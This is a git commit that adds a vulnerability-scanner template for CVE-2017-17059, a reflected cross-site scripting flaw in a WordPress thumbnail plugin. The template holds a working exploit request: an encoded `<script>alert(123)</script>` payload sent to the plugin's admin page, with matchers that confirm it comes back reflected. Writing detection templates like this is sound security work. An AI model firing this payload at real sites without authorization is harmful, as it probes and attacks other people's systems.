Merge pull request #2043 from daffainfo/patch-71

Create CVE-2017-17059.yaml
2021-07-16 10:49:20 +05:30 · 2021-07-16 10:49:20 +05:30 · c7d0efa420
parent a5efbf1289 be7247bc77
commit c7d0efa420
1 changed files with 34 additions and 0 deletions
--- a/cves/2017/CVE-2017-17059.yaml
+++ b/cves/2017/CVE-2017-17059.yaml
@ -0,0 +1,34 @@
+id: CVE-2017-17059
+
+info:
+  name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.
+  reference: |
+    - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-17059
+  tags: cve,cve2017,wordpress,xss,wp-plugin
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+
+    body: "amty_hidden=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<script>alert(123)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200